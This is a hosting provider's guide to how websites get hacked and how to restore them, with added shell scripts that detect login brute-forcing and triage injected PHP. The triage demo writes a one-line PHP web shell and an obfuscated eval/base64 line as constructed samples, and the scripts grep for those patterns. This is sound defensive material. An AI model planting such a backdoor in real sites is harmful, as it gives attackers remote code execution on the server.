How to Restore Hacked Sites
There are no known security vulnerabilities in our software, but website hacks are becoming more and more common,
so we've created this page to help you understand the issue and to provide tips on restoring a hacked site.
*Note: For the purposes of this document we use the term "hacker" to refer to a malicious user who is intent on gaining unauthorized access to a computer system
or network by bypassing or breaking its security controls. The term can also be used in a positive context to refer to hobbyists or the programmer subculture
that includes the pioneers of the internet. For more information see:
How hackers get in
Almost all website hacks these days are automated: rather than sitting in front of a computer, hackers* use
scripts that scan thousands of websites an hour for known security vulnerabilities and weaknesses.
The top ways a hacker compromises a website are:
- Exploiting known vulnerabilities in older versions of popular web scripts such as WordPress, email forms, image galleries, etc.
  - Open-source and free scripts are installed on millions of servers, so a single vulnerability gives the hacker millions of targets.
  - These scripts have well-known URLs and filenames (such as wp-login.php) that hackers can scan for.
  - Even if you don't use the script, or it was installed by default by your host, it can still be exploited.
- Guessing easy passwords. Weak passwords are usually short, simple, common, dictionary words, or reused from another site.
  - Automated scripts can test thousands of passwords a minute. (See Wikipedia: Brute-force Attack)
- Compromising another account on a shared-hosting server and using it to gain access to other sites on the same server, including yours.
  - This should not be possible if your web host has applied all the latest security patches and updates and keeps each account isolated from the others.
  - If you are repeatedly hacked and you believe the host is the cause, there is nothing you can do but switch hosts (or servers).
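The automated scanning and password guessing described above leave a distinctive trace in the web server's access log: many requests to the same login URL from one address in a short time. The script below, an added example rather than code from this page or its product, flags such addresses. It assumes the common Apache/nginx "combined" log format; the list of login URLs and the threshold are assumptions to adjust for the applications you actually run, and the log lines are constructed for the demo.

```shell
#!/bin/sh
# Added example (not part of the original page): spotting automated login
# guessing in a web server access log. Assumes the Apache/nginx "combined"
# log format; the URL list and threshold are assumptions, tune them to your
# own applications.

# Print "count ip" for each client that sent more than $2 (default 10)
# requests to a login or admin URL in the log file $1. A person logs in a
# few times a day; a password-guessing script sends dozens a minute.
login_floods() {
    log="$1"
    threshold="${2:-10}"
    awk -v t="$threshold" '
        # $1 = client IP, $7 = request path in the combined log format
        $7 ~ /^\/(wp-login\.php|xmlrpc\.php|administrator\/|admin\/)/ { n[$1]++ }
        END { for (ip in n) if (n[ip] > t) print n[ip], ip }
    ' "$log" | sort -rn
}

# Constructed sample log: twelve POSTs to wp-login.php from one address in
# twelve seconds (a script), plus ordinary browsing and one real login from
# two other addresses.
SAMPLE_LOG="$(mktemp)"
i=0
while [ "$i" -lt 12 ]; do
    printf '203.0.113.5 - - [10/Oct/2023:13:55:%02d +0000] "POST /wp-login.php HTTP/1.1" 200 4321 "-" "python-requests/2.31"\n' \
        "$((36 + i))" >> "$SAMPLE_LOG"
    i=$((i + 1))
done
cat >> "$SAMPLE_LOG" <<'EOF'
198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2023:13:56:05 +0000] "GET /about/ HTTP/1.1" 200 5432 "https://example.com/" "Mozilla/5.0"
192.0.2.77 - - [10/Oct/2023:14:02:10 +0000] "GET /wp-login.php HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
192.0.2.77 - - [10/Oct/2023:14:02:31 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "https://example.com/wp-login.php" "Mozilla/5.0"
EOF

login_floods "$SAMPLE_LOG" 5    # prints: 12 203.0.113.5
```

Point it at the real log (the path depends on the host; Plesk and most Linux hosts keep per-domain logs under the account's home directory) and block the addresses it reports at the firewall, or automate that with a tool such as fail2ban. The legitimate user at 192.0.2.77 stays under the threshold; the script at 203.0.113.5 does not.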
Once a hacker gains access to your site through one of the methods described above, they have the same rights
as you do when you connect with FTP, or as the user PHP runs as (read and write files and the database, install programs, send email,
etc.), and in some cases they can go on to gain full control of the server with administrator (root) rights.
What they do once they're in
Typically, once they have control of a website (and remember, most of this is done automatically) they will:
- Install additional programs and backdoors to make it easier to keep control of your server.
- Use your server to send bulk unsolicited email (spam).
- Use your server to attack other servers and websites and gain control of them.
- Redirect visitors arriving from Google and other search engines to other websites.
- Display spam links on your 404 "Not Found" pages.
- Insert links or spam into your pages.
- Use the hijacked website to attempt to gain further access to your network or your web host's network.
Hackers want to use your server for as long as possible without being discovered, so spam links often go undetected
for some time: they are placed on pages you are unlikely to see, such as "404 Not Found" pages or pages that are not
linked from your own navigation, so nothing looks wrong when you browse the site yourself.
How it can affect your site
Even if the changes are minimal or hard to detect, they can have a very negative effect on your traffic,
website revenue, and reputation. Some examples include:
- You can lose traffic, because search engines, browsers and anti-virus programs may block or warn about your website.
- You can be flagged by Google as a malware site if your site is hosting malware.
- Your server can be blacklisted by email gateways if your site is sending spam, so your own legitimate mail bounces too.
- You can lose customers or reputation if website visitors see anti-virus warnings, pharmaceutical spam links, pornography, malware, etc.
- Your search engine ranking can be reduced, or you may be removed from search engines altogether.
- Your site may slow down if the server's resources are being used for other purposes (spam runs, attacks on other sites).
- You may exceed your bandwidth and CPU quotas and/or be charged overage fees.
Recovering/Restoring your website
Recovering from a hacking attack takes time and effort; use the following steps as a starting point:
- Scan your local computer
  - Install an anti-virus program if you don't have one. Try Microsoft Security Essentials for Windows and ClamXav for Macs.
  - Run a full anti-virus/malware scan. A compromised local PC can leak your FTP and admin passwords, so if you clean the site but not the PC it will be hacked again.
- Back up the hacked site
  - Back up the MySQL databases and all website files to your computer, labelling them as the hacked backup.
  - This lets you restore the previous state if your cleaning or upgrade attempts fail, and keeps a record of what was changed.
- Contact your web host
  - Find out if other sites on the server have been hacked (especially if you are on shared hosting).
  - Ask if they have any backups of your database or website files.
  - Find out if they have any tips or services for restoring hacked sites.
- Restore from backup or clean infected files
  - If you have a clean backup of your files from before the hack, consider restoring it.
  - Failing that, you will need to manually review and compare all files to find exploited or modified code.
  - One method to quickly replace program files is to upgrade or re-install the web applications from a fresh download.
- Remove unneeded applications, files, or plugins
  - If you don't think you need an application or file, remove it.
  - Make sure your files were backed up in an earlier step so you can restore any file that was removed by accident.
- Upgrade all remaining applications and plugins
  - Make a list of all the applications and plugins on your site and their current versions.
  - For each application or plugin, download the latest version and install it.
- Change all your passwords
  - Make a list of all your passwords.
  - Change all your passwords for FTP, Email, Plesk, MySQL, etc. to new, strong ones that are not reused elsewhere.
- Review the reference links at the bottom of the page.
- Do some googling and online reading to find out more about best practices for restoring after a hack.
- If you continue to have security problems, consider hiring a security professional to assist you.
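The "back up the hacked site" and "restore from backup or clean infected files" steps above come down to three shell operations: archive the site exactly as it is, compare the hacked tree against a known-clean copy of the same application version (a fresh download serves where no pre-hack backup exists), and grep for the obfuscation constructs injected PHP almost always uses. The script below is an added example, not code from this page or its product; the directory layout, file names, grep patterns and the use of a fresh download as the clean copy are assumptions, and the small WordPress-like tree is constructed so the script runs offline.

```shell
#!/bin/sh
# Added example (not part of the original page): the backup-then-triage
# steps as shell functions. Directory layout, file names and patterns are
# assumptions for the demo; a constructed tree stands in for the real
# document root and a fresh download of the same version for the clean copy.

# 1. Back up the hacked site exactly as it is, labelled as the hacked copy,
#    before touching anything. The database dump is left as a comment because
#    the offline demo has no MySQL server; run it for real with your DB name.
backup_hacked_site() {   # $1 = document root, $2 = destination directory
    stamp="$(date +%Y%m%d)"
    mkdir -p "$2"
    tar -czf "$2/hacked-files-$stamp.tgz" -C "$1" .
    # mysqldump --single-transaction "$DB_NAME" > "$2/hacked-db-$stamp.sql"
    echo "$2/hacked-files-$stamp.tgz"
}

# 2. List every file in the hacked tree that differs from, or does not exist
#    in, a known-clean copy of the same application version. This replaces
#    eyeballing thousands of files by hand.
changed_files() {        # $1 = hacked document root, $2 = clean copy
    diff -rq "$2" "$1" | awk '
        /^Only in /         { sub(/^Only in /, ""); sub(/: /, "/"); print; next }
        /^Files .* differ$/ { print $4 }'
}

# 3. Grep for constructs that injected PHP almost always uses and normal
#    application code rarely does. Every hit is something to read, not proof
#    of infection on its own.
suspicious_php() {       # $1 = directory to scan
    find "$1" -type f -name '*.php' -exec grep -lE \
        'eval\(|base64_decode\(|gzinflate\(|str_rot13\(|assert\(' {} +
}

# Constructed demo tree: a clean copy and a hacked copy of the same site.
DEMO="$(mktemp -d)"
CLEAN="$DEMO/clean"
HACKED="$DEMO/hacked"
mkdir -p "$CLEAN/wp-content/plugins/real" "$CLEAN/wp-content/uploads" \
         "$HACKED/wp-content/plugins/real" "$HACKED/wp-content/uploads"
printf '%s\n' '<?php echo "Hello";' > "$CLEAN/index.php"
printf '%s\n' '<?php function real_plugin() { return 1; }' > "$CLEAN/wp-content/plugins/real/real.php"
cp "$CLEAN/index.php" "$HACKED/index.php"
cp "$CLEAN/wp-content/plugins/real/real.php" "$HACKED/wp-content/plugins/real/real.php"
# Injected line appended to a legitimate file (the base64 is a harmless echo).
printf '%s\n' 'eval(base64_decode("ZWNobyAnc3BhbSc7"));' >> "$HACKED/index.php"
# Dropped backdoor in a directory the web server can write to.
printf '%s\n' '<?php @eval($_POST["c"]);' > "$HACKED/wp-content/uploads/shell.php"

backup_hacked_site "$HACKED" "$DEMO/backup"
changed_files "$HACKED" "$CLEAN"     # index.php and wp-content/uploads/shell.php
suspicious_php "$HACKED"             # the same two files
```

The two lists should be read together: a file that is both changed and suspicious is almost certainly injected code, while a changed file with no suspicious constructs may simply be your own customisation and deserves a diff before it is replaced. Files that appear only in the hacked tree (here shell.php) are the ones to look at first, since a clean re-install will never remove them.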